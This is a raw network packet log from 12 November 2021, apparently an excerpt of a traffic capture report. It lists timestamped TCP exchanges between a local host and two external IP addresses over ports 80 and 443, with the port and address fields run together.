                          Nov 12, 2021 22:23:15.902971029 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.902982950 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.924681902 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.924690008 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.924704075 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.924789906 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.924901962 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.925188065 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:15.925200939 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.368885040 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.369174004 CET4979580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.751239061 CET4979580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.752315044 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.773783922 CET8049795178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.774036884 CET4979580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.774729013 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.774857044 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.775341988 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.775444031 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.775630951 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.775707006 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.797794104 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.797842026 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.798008919 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.798041105 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.798093081 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.798115015 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.798121929 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.798155069 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.798182011 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.798182964 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.798201084 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.798214912 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.798229933 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.798244953 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.798294067 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.798320055 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.798341990 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.798362970 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.798383951 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.798407078 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.798454046 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.820651054 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.820677042 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.820684910 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.820693016 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.820744991 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.820758104 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.820823908 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.820832014 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.820879936 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.820894003 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.820899010 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.820936918 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.820950985 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.820988894 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.821089983 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.821130037 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.821150064 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.821165085 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.821180105 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.821212053 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.821221113 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.821242094 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.821259022 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.821280003 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.821305990 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.821532965 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.821548939 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.821563959 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.821578026 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.821614981 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.821649075 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.821676016 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.843283892 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.843307018 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.843317986 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.843329906 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.843343973 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.843358040 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.843365908 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.843374968 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.843386889 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.843395948 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.843451023 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.843452930 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.843477011 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.843506098 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.843518019 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.843532085 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.843607903 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.843621969 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.843642950 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.843651056 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.843698025 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:17.843704939 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.843719959 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.843732119 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.843744993 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.843844891 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.843856096 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.843882084 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.843897104 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.843961000 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.843972921 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.843981028 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.843992949 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.844011068 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.844027042 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.844042063 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.844073057 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.844085932 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.844158888 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.844173908 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.844186068 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.844211102 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.865876913 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.865916967 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.865931988 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.865947008 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.865993977 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.866092920 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.866157055 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.866189957 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.866230965 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.870863914 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:17.870978117 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.313287973 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.314771891 CET4979780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.335743904 CET8049796178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.335815907 CET4979680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.337106943 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.337219954 CET4979780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.338051081 CET4979780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.338172913 CET4979780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.338393927 CET4979780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.338515997 CET4979780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.360445023 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.360471010 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.360656977 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.360711098 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.360723019 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.360738039 CET4979780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.360749006 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.360763073 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.360805035 CET4979780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.360822916 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.360833883 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.360857964 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.360861063 CET4979780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.360873938 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.360874891 CET4979780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.360888004 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.360915899 CET4979780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.360949039 CET4979780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.383111954 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.383132935 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.383141994 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.383200884 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.383213997 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.383227110 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.383238077 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.383249998 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.383260965 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.383275032 CET4979780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.383311033 CET4979780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.383316040 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.383352041 CET4979780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.383389950 CET4979780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.383397102 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.383409977 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.383420944 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.383434057 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.383445024 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.383452892 CET4979780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.383457899 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.383488894 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.383490086 CET4979780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.383497953 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.383505106 CET4979780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.383510113 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.383554935 CET4979780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.383585930 CET4979780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.405687094 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.405710936 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.405735016 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.405738115 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.405786991 CET4979780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.405833960 CET4979780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.405889034 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.405903101 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.405915022 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.405936003 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.405937910 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.405945063 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.405951023 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.405958891 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.405975103 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.405987978 CET4979780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.405992031 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.405999899 CET4979780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.406044960 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.406059027 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.406071901 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.406085968 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.406097889 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.406111002 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.406265974 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.406286001 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.406287909 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.406294107 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.406307936 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.406322002 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.406333923 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.406344891 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.406352997 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.406363010 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.406371117 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.406383038 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.406394005 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.406405926 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.406418085 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.406505108 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.406517982 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.406529903 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.428215027 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.428240061 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.428495884 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.428514004 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.428527117 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.428607941 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.431119919 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.431216002 CET4979780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.519005060 CET4979780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.520613909 CET4979880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.541464090 CET8049797178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.541558027 CET4979780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.542870998 CET8049798178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.542989969 CET4979880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.548904896 CET4979880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.571253061 CET8049798178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.575047970 CET8049798178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:18.575196028 CET4979880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:18.582032919 CET4978480192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:18.583569050 CET4979980192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:18.600260019 CET8049799162.159.129.233192.168.2.4
                          Nov 12, 2021 22:23:18.600287914 CET8049784162.159.129.233192.168.2.4
                          Nov 12, 2021 22:23:18.600388050 CET4979980192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:18.600425005 CET4978480192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:18.601067066 CET4979980192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:18.617666960 CET8049799162.159.129.233192.168.2.4
                          Nov 12, 2021 22:23:18.630228996 CET8049799162.159.129.233192.168.2.4
                          Nov 12, 2021 22:23:18.630347013 CET4979980192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:18.846601963 CET49800443192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:18.846673965 CET44349800162.159.129.233192.168.2.4
                          Nov 12, 2021 22:23:18.846770048 CET49800443192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:18.848192930 CET49800443192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:18.848227978 CET44349800162.159.129.233192.168.2.4
                          Nov 12, 2021 22:23:18.885814905 CET44349800162.159.129.233192.168.2.4
                          Nov 12, 2021 22:23:18.885900974 CET49800443192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:18.886559963 CET49800443192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:18.886573076 CET44349800162.159.129.233192.168.2.4
                          Nov 12, 2021 22:23:18.890214920 CET49800443192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:18.890235901 CET44349800162.159.129.233192.168.2.4
                          Nov 12, 2021 22:23:19.018625975 CET4979880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.019730091 CET4980180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.041019917 CET8049798178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.041083097 CET4979880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.042123079 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.042231083 CET4980180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.042795897 CET4980180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.042891979 CET4980180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.043067932 CET4980180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.043206930 CET4980180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.052400112 CET44349800162.159.129.233192.168.2.4
                          Nov 12, 2021 22:23:19.052491903 CET49800443192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:19.052510977 CET44349800162.159.129.233192.168.2.4
                          Nov 12, 2021 22:23:19.052541018 CET44349800162.159.129.233192.168.2.4
                          Nov 12, 2021 22:23:19.052580118 CET49800443192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:19.052695036 CET49800443192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:19.053081036 CET49800443192.168.2.4162.159.129.233
                          Nov 12, 2021 22:23:19.053107023 CET44349800162.159.129.233192.168.2.4
                          Nov 12, 2021 22:23:19.065257072 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.065280914 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.065371037 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.065407038 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.065458059 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.065471888 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.065484047 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.065486908 CET4980180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.065495968 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.065506935 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.065520048 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.065532923 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.065557003 CET4980180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.065579891 CET4980180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.065587997 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.065598011 CET4980180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.065612078 CET4980180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.065634012 CET4980180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.087939024 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.087964058 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.087973118 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.087985992 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.087996960 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.088010073 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.088018894 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.088032961 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.088042021 CET4980180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.088043928 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.088098049 CET4980180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.088099003 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.088112116 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.088131905 CET4980180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.088155031 CET4980180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.088171005 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.088181973 CET4980180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.088186026 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.088200092 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.088212967 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.088227987 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.088239908 CET4980180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.088260889 CET4980180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.088263035 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.088277102 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.088283062 CET4980180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.088289976 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.088305950 CET4980180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.088330030 CET4980180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.088346004 CET4980180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.110555887 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.110579967 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.110593081 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.110606909 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.110620022 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.110641003 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.110657930 CET4980180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.110709906 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.110733032 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.110743999 CET4980180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.110745907 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.110755920 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.110773087 CET4980180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.110785961 CET4980180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.110810041 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.110821009 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.110829115 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.110841036 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.110856056 CET4980180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:19.110874891 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.110888958 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.110902071 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.110914946 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.110927105 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.110939980 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.110954046 CET8049801178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:19.110966921 CET8049801178.208.83.45192.168.2.4
